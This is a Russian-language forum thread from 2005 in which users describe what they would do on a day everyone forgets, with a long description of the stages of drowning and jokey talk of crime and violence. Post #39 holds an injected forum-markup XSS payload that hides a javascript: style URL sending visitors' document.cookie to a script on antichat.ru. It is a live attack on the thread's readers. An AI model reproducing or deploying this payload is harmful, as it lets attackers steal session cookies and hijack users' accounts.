Пикантный вопросик

Разговоры на любые темы.

#21  Отвратительная » Вт 4.10.2005, 3:47

Утонула бы и убедилась -а правда это больно или нет)))
Жить - хорошо, а ХОРОШО жить -еще лучше!!!
Отвратительная
постоялец

#22  Alexx » Вт 4.10.2005, 4:01

Proton ты голубой или девушка? :mrgreen:

Добавлено спустя 9 минут 6 секунд:

Отвратительная

Пять стадий следуют одна за другой с фатальной последовательностью. Сначала страх перед погружением под воду рефлекторно заставляет вдохнуть максимум воздуха. Тем самым тело на определенное время еще обеспечивается кислородом. Когда нос и рот уходят под воду, все, умеет человек плавать или нет, автоматически задерживают дыхание. Повышение содержания двуокиси углерода в крови ведет к раздражению дыхательного центра, находящегося в мозгу.

Если концентрация двуокиси превышает определенное пороговое значение, то в следующей стадии безусловный рефлекс заставляет сделать вдох. Хочет человек этого или нет, легкие со всей силой пытаются заполниться воздухом. При этом вода - зачастую вперемешку с воздухом - попадает в бронхи. Это, в свою очередь, вызывает судорожные сокращения диафрагмы, в результате чего попавшая в органы дыхания вода, секрет из бронхов и воздух перемешиваются друг с другом. При этом образуется содержащая белок белая пена, которая через дыхательные пути поднимается вверх, вплоть до носоглотки.

Поскольку одновременно в мозгу все продолжает снижаться концентрация кислорода, тело начинает реагировать массированными судорогами: все мышцы начинают бесконтрольно дрожать. В этой стадии утопающий находится уже без сознания.

В пятой, последней фазе дыхание прекращается и сердце останавливается. В зависимости от того, тонет ли человек в пресной или соленой воде, продолжительность отдельных стадий меняется. В случае с морской водой - например, при цунами - в кровь быстро в больших концентрациях через легочные альвеолы попадают ионы кальция и магния. Это практически мгновенно ведет к остановке сердца. Если же в легкие попадает пресная пода, то через легочные капилляры она попадает в кровь и растворяет красные кровяные тельца. Выделяющийся при этом калий тоже ядовит для сердца. Сердечные волокна перестают сокращаться синхронно, происходит мерцание желудочков. Из-за этого опять же быстро падает концентрация кислорода в мозгу.

Короче все очень хреново ...
Alexx
постоялец

#23  Отвратительная » Вт 4.10.2005, 4:53

Млин, нафиг рассказал, интересно было самой всЁ пройти(((
Отвратительная
постоялец

#24  Отвратительная » Пн 10.10.2005, 5:39

Alexx А если зимой утонуть под лед - такие же ощущения?
Отвратительная
постоялец

#25  Alexx » Пн 10.10.2005, 14:06

Отвратительная
А если зимой утонуть под лед - такие же ощущения?

Будет полегче...
При низких температурах всегда легче...
Alexx
постоялец

#26  Искушение смертью » Пн 10.10.2005, 14:43

не... надо чё-нить пооригинальней... а что, иСЧо не придумала...

но ИМХО, нужно сделать что-нить не такое, что типа утонуть или морду президенту набить, а надо что-нить такое, чтоб вся земля запомнила...
ну по-любому, я всех кошек уничтожу!!1 я их НЕНАВИЖУ :twisted: а остальоне я ещё придумаю... :wink:
Изображение
Искушение смертью
постоялец

#27  Jaguar » Пн 10.10.2005, 22:27

я бы купил ствол и просто бы замочил всех недругов , или бы с друзьями в need for speed в РЛ бы погонял :D
Alexx, если ты хорошо разбираешься в смерти ... то какие ощущения при сгорании? :twisted: :)
wbr JAGUAR
Jaguar
постоялец

#28  Miker » Вт 11.10.2005, 19:36

Пипетс).. Неизменными останутся только истинные желания, невыговоренные и не написанные, как и были до создания темы этой).. Жаль, что всё более становится агрессивных натур, которые постоянно врут, знают, что врут, но тем не менее продолжают творить информацию по части "насрал, а теперь отдыхаю")..

В этот день сурка бы я забил на пары и остался дома, поспал бы от души, потом забрал бы свою рыбку из университета и проводил бы до дома, как в старые добрые времена, вернулся бы в час ночи)
"Ох, деньги имеют изрядную силу
Коль можно девицу купить за кобылу"
Miker
постоялец

#29  Искушение смертью » Ср 12.10.2005, 0:22

а на самом деле я бы просто жила бы так, как есть...
только бы не подчинялась тем общественным нормам, которые я и так соблюдаю слегка :roll: :twisted: :mrgreen:
Изображение
Искушение смертью
постоялец

#30  Отвратительная » Сб 22.10.2005, 6:03

Была бы президентом, то изменила бы нашу хреновую жизнь на ту, которую мы заслуживаем уже, а именно -хорошую!!! Только вот минимум на это нужен год, а не один день(((
Отвратительная
постоялец

#31  Метелица » Вт 8.11.2005, 14:01

Тут некоторые столько бы сделали, что и суток не хватит. Да уж. Я поскромней.
1. Я бы набрала кредитов в банках, во всех и максимально возможные суммы.
2. Высказала бы всю свою боль бывшему своему возлюбленному за невостребованность моих чувств.
Метелица
постоялец

#32  Острая » Вс 13.11.2005, 7:22

Miker:Пипетс).. Неизменными останутся только истинные желания, невыговоренные и не написанные, как и были до создания темы этой).. Жаль, что всё более становится агрессивных натур, которые постоянно врут, знают, что врут, но тем не менее продолжают творить информацию по части "насрал, а теперь отдыхаю")..

Лучше не скажу, поэтому: браво. :mrgreen:
Если со мной становится скучно, значит, я утратила к вам интерес.Изображение
Острая

#33  Ёлочка » Вс 20.11.2005, 17:42

Я бы обзвонила своих бывших...может быть даже с кем-то из них встретилась...
Хочу выучиться на палача и фрилансить...
Ёлочка
постоялец

#34  Valoon » Пн 21.11.2005, 4:40

Если бы как по сценарию в "День сурка":
С утра грабанул бы кого нидь(типа инкассаторов)
Потом бы затарил полную машину подарками и цветами
Потом бы весь день гонял по городу и дарил бы всем подряд все это
Потом бы встретился с какой-нибудь из знакомых девушек и устроил бы ей незабываемый вечер в каком-нибудь ресторане... Да чо там - весь ресторан бы откупил... Чтоб только она и я... Утопил бы во внимании и ласке... Все бы для нее сделал ... А потом... можно было бы даже без секса... поговорили бы о чем нибудь... и заснули бы в обнимку... Хотя можно было бы и с сексом...
Эх..
Мож во мне романтик погибает...
Valoon

#35  кикимора » Пн 21.11.2005, 14:37

А я бы заказала своей начальнице мужика на всю ночь, что бы она наконец познала радости секса...
Уважай мужчин, и они будут уважать тебя!
Моя совесть настолько чиста и прозрачна, что её практически не видно
кикимора
постоялец

#36  Carmaggeddon » Пн 21.11.2005, 16:42

аааааааааааа.... ни то все пишете.. какой банк каки машины.. это жэ несбыточно!
вот простой человек без подготовки разве пойдет грабить банк.. нунахЪ.. не врите мне что вы такие умные и все сразу сумеете.. сразу посадят.. эт во первых... во вторых угнать тачку... ГА.. тожэ самое, хотя я согласна с Пробассом.. тож хотела угнать бы какой нить линкольн навигатор и презирая правила дорожного движения каталась бы по городу, главное чтобы не поймали. НО все равно бы поймали.. за целый день то...
в третьих.. из поступков.. если бы все забыли бы.. и при условии чтобы я ни помнила.. а зачем тогда совершать?? ладно если бы все не помнили бы.. но а я то... както склоняюсь к мысли, что вопрос немного не так поставлен...

аморальный поступок не совершила бы..просто потому что совесть не позволила =\ никого бы убивать не стала бы... ну и далее по списку.. и убиваться не стала бы.. глупо.
гы.. ну и про кредиты и ижэ с ними.. взяли.. а на завтра забыли где деньги))) :lol2:
девушки как мороженое: вначале холодные как лед, потом тают, а потом липнут..
Carmaggeddon
постоялец

#37  Di » Пн 21.11.2005, 18:08

Carmaggeddon
ты неправильно мыслишь

вот я бюы набрал кредитов, но.....обязательно у себя на столе оставил записку, а там написал куда деньги девал и что делал

а ты тут так всех обескуражила :lol2:
Di
Психонавт

#38  Метелица » Пн 21.11.2005, 20:06

кикимора
Не, нельзя, чтобы она такое забыла. Разве тебе не интересно увидеть, как изменится её выражение лица, взгляд, увидеть, как её характер меняется в лучшую сторону, как она становится человечнее и понимающей проблемы других, как она начнёт становиться женщиной. Вы там на работе подумайте всем коллективом, может вам и вправду нанять какого-нибудь жиголо?
Метелица
постоялец

#39  trash » Пн 21.11.2005, 20:07

[font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]][/font]
trash

#40  anka » Пн 21.11.2005, 23:57

Valoon Эх........ Спрашивается! Почему я не твоя знакомая девушка и почему, такого дня не может быть??....
anka
постоялец

Аватара
спонсор